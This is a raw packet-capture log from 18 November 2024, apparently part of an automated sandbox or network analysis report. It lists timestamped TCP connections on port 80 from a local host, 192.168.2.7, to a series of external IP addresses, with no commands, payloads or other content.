                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.385080099 CET805003644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.390086889 CET5003680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.395428896 CET805003644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.395517111 CET5003680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.597064018 CET5003780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.602057934 CET805003718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.602123022 CET5003780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.602369070 CET5003780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.602369070 CET5003780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.607292891 CET805003718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.607306004 CET805003718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.070590019 CET805003718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.071680069 CET5003780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.076800108 CET805003718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.078207016 CET5003780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.367357969 CET5003880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.372433901 CET805003818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.372534037 CET5003880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.376399994 CET5003880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.376444101 CET5003880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.381305933 CET805003818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.381323099 CET805003818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.199114084 CET805003818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.199253082 CET5003880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.204509974 CET805003818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.205116034 CET5003880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.433860064 CET5003980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.438713074 CET805003918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.438798904 CET5003980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.442679882 CET5003980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.442679882 CET5003980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.447518110 CET805003918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.447530031 CET805003918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.096126080 CET805003918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.096324921 CET5003980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.102274895 CET805003918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.102509022 CET5003980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.308809996 CET5004080192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.313832045 CET805004013.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.313894987 CET5004080192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.317079067 CET5004080192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.317114115 CET5004080192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.322051048 CET805004013.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.322065115 CET805004013.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.749259949 CET805004013.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.752553940 CET5004080192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.758147001 CET805004013.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.758230925 CET5004080192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.981477022 CET5004180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.986366987 CET805004113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.986439943 CET5004180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.986740112 CET5004180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.986783981 CET5004180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.110785961 CET5004880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.115576029 CET805004813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.115586996 CET805004813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.476957083 CET805004718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.478308916 CET5004780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.483618975 CET805004718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.485624075 CET5004780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.494863033 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.500021935 CET8050049172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.501005888 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.501005888 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.501075983 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.506004095 CET8050049172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.506015062 CET8050049172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.558746099 CET805004813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.559248924 CET5004880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.564980030 CET805004813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.565632105 CET5004880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.964430094 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.969374895 CET805005034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.969500065 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.969628096 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.969647884 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.974597931 CET805005034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.974616051 CET805005034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.153330088 CET8050049172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.156614065 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.156614065 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.158232927 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.161603928 CET8050049172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.163058996 CET8050051172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.163176060 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.184406996 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.184406996 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.189296961 CET8050051172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.189311028 CET8050051172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.826304913 CET8050051172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.826391935 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.826838970 CET805005034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.850538969 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.851341009 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.855467081 CET8050051172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.856743097 CET805005034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.857928991 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.864492893 CET5005280192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.869553089 CET805005234.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.869772911 CET5005280192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.869822979 CET5005280192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.869934082 CET5005280192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.874686956 CET805005234.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.874711990 CET805005234.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.119132996 CET5005380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.124135017 CET80500533.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.125538111 CET5005380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.125663042 CET5005380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.125680923 CET5005380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.854805946 CET805006044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.854883909 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.854978085 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.854994059 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.859865904 CET805006044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.859875917 CET805006044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.254091024 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.301701069 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.441463947 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.441517115 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.446448088 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.446463108 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.528311968 CET805006044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.528546095 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.533870935 CET805006044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.533957958 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.548698902 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.553601027 CET805006154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.553879976 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.553879976 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.553910971 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.558769941 CET805006154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.558820009 CET805006154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.705045938 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.754844904 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.946144104 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.951189041 CET805006247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.951334953 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.951535940 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.951535940 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.956368923 CET805006247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.956379890 CET805006247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.402029991 CET805006154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.402548075 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.407888889 CET805006154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.407948017 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.417326927 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.422318935 CET805006335.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.422373056 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.422815084 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.422975063 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.427634954 CET805006335.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.427768946 CET805006335.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.267492056 CET805006335.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.267667055 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.273494959 CET805006335.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.274197102 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.420805931 CET805006247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.422631025 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.428895950 CET805006247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.429582119 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.736315012 CET5006480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.741159916 CET805006434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.741225958 CET5006480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.744335890 CET5006480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.744358063 CET5006480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.710999966 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.711086988 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.711086988 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.715989113 CET805007034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.716056108 CET805007034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.739243984 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.766616106 CET805006918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.766810894 CET5006980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.772092104 CET805006918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.772146940 CET5006980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.182128906 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.187041998 CET805007113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.187249899 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.187603951 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.187663078 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.192414999 CET805007113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.192465067 CET805007113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.543222904 CET805007034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.543396950 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.549348116 CET805007034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.549398899 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.579353094 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.584316969 CET805007254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.584372044 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.584867954 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.584867954 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.589634895 CET805007254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.589826107 CET805007254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.416261911 CET805007254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.416424990 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.422472954 CET805007254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.422569036 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.430177927 CET5007380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435065031 CET805007318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435157061 CET5007380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435285091 CET5007380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435323954 CET5007380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.440776110 CET805007318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.441250086 CET805007318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.628956079 CET805007113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.629156113 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.634450912 CET805007113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.636790037 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.203851938 CET5007480192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.209764957 CET805007434.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.209861040 CET5007480192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.233120918 CET5007480192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.233120918 CET5007480192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.238071918 CET805007434.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.238089085 CET805007434.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.723906994 CET5007480192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.756127119 CET5007580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761176109 CET805007534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761267900 CET5007580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761553049 CET5007580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761553049 CET5007580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.647479057 CET5008280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.652276993 CET805008218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.652354002 CET5008280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.653544903 CET5008280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.653558969 CET5008280192.168.2.718.208.156.248
